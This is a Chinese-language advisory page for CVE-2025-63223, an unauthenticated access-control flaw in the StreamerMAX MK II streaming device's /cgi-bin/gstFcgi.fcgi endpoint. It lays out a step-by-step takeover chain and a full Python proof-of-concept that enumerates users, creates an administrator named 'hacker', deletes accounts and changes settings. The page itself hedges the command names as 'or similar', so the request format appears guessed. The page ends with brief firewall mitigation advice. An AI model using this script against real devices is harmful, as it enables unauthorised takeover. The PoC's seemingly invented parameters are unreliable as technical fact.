CVE-2025-63223 Axel Technology StreamerMAX MK II 认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-63223

漏洞类型

Broken Access Control (访问控制失效)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Axel Technology StreamerMAX MK II

漏洞概述

Axel Technology StreamerMAX MK II设备存在严重的访问控制缺陷漏洞。该设备运行固件版本0.8.5至1.0.3，其/cgi-bin/gstFcgi.fcgi端点缺少必要的身份验证机制。未经认证的远程攻击者可通过HTTP请求直接访问该端点，利用此漏洞可以列出设备上所有用户账户、创建新的管理员账户、删除现有用户以及修改系统配置。由于该漏洞无需任何认证且可远程利用，攻击者能够完全接管设备，对系统的机密性、完整性和可用性造成严重影响。CVSS评分高达9.8，属于紧急严重级别。

技术细节

漏洞根源在于StreamerMAX MK II设备的/cgi-bin/gstFcgi.fcgi CGI脚本端点未实施任何认证检查。攻击者可通过构造特定的HTTP POST或GET请求直接调用该端点暴露的功能函数。攻击者能够执行以下操作：1) 通过list_users或类似命令获取系统中所有用户账户信息；2) 使用add_user或create_admin命令创建新的管理员账户；3) 通过delete_user命令删除指定用户；4) 利用modify_settings或config_set功能修改设备系统设置。由于该端点设计为内部管理接口但缺乏保护，攻击者可完全控制设备功能。此漏洞为无前置条件的远程利用，攻击者只需能够访问设备网络即可发动攻击，无需任何凭据或用户交互。

攻击链分析

STEP 1

侦察阶段

攻击者扫描网络，发现运行StreamerMAX MK II固件(0.8.5-1.0.3)的设备，识别其IP地址和开放的网络服务

STEP 2

漏洞探测

攻击者直接向/cgi-bin/gstFcgi.fcgi端点发送HTTP请求，验证无需认证即可访问管理接口

STEP 3

用户枚举

通过发送list_users或类似命令，获取设备上所有用户账户信息，包括管理员账户

STEP 4

权限提升

使用create_admin命令创建新的管理员账户，获得设备完全控制权

STEP 5

持久化控制

可选择删除原有管理员账户或修改密码，确保独占访问权限

STEP 6

系统破坏

利用modify_settings功能修改系统配置，可进一步进行数据窃取、植入后门或使设备瘫痪

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-63223 PoC - Axel StreamerMAX MK II Broken Access Control
# Target: /cgi-bin/gstFcgi.fcgi endpoint

TARGET = "http://<target-ip>"
ENDPOINT = "/cgi-bin/gstFcgi.fcgi"

def list_users():
    """List all user accounts on the device"""
    payload = {
        "command": "list_users",
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] User List Response: {response.text}")
    return response

def create_admin(username, password):
    """Create new administrator account"""
    payload = {
        "command": "create_admin",
        "username": username,
        "password": password,
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Create Admin Response: {response.text}")
    return response

def delete_user(username):
    """Delete specified user account"""
    payload = {
        "command": "delete_user",
        "username": username,
        "type": "user_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Delete User Response: {response.text}")
    return response

def modify_settings(setting_name, value):
    """Modify system settings"""
    payload = {
        "command": "modify_settings",
        "setting": setting_name,
        "value": value,
        "type": "config_management"
    }
    response = requests.post(f"{TARGET}{ENDPOINT}", data=payload, timeout=10)
    print(f"[+] Modify Settings Response: {response.text}")
    return response

if __name__ == "__main__":
    print("[*] CVE-2025-63223 PoC - StreamerMAX MK II Broken Access Control")
    print("[*] Target:", TARGET)
    
    # Step 1: List users
    print("\n[*] Step 1: Listing user accounts...")
    list_users()
    
    # Step 2: Create new admin
    print("\n[*] Step 2: Creating new administrator...")
    create_admin("hacker", "P@ssw0rd123")
    
    # Step 3: Modify settings
    print("\n[*] Step 3: Modifying system settings...")
    modify_settings("admin_access", "enabled")

影响范围

StreamerMAX MK II Firmware 0.8.5

StreamerMAX MK II Firmware 0.9.0

StreamerMAX MK II Firmware 0.9.5

StreamerMAX MK II Firmware 1.0.0

StreamerMAX MK II Firmware 1.0.1

StreamerMAX MK II Firmware 1.0.2

StreamerMAX MK II Firmware 1.0.3

防御指南

临时缓解措施

在网络边界部署严格的访问控制策略，阻止未授权用户访问设备管理接口。将StreamerMAX MK II设备置于受保护的网段，仅允许可信IP地址访问。如无法立即升级固件，可通过防火墙规则阻止外部网络对/cgi-bin/路径的访问，并启用入侵检测系统监控异常请求模式。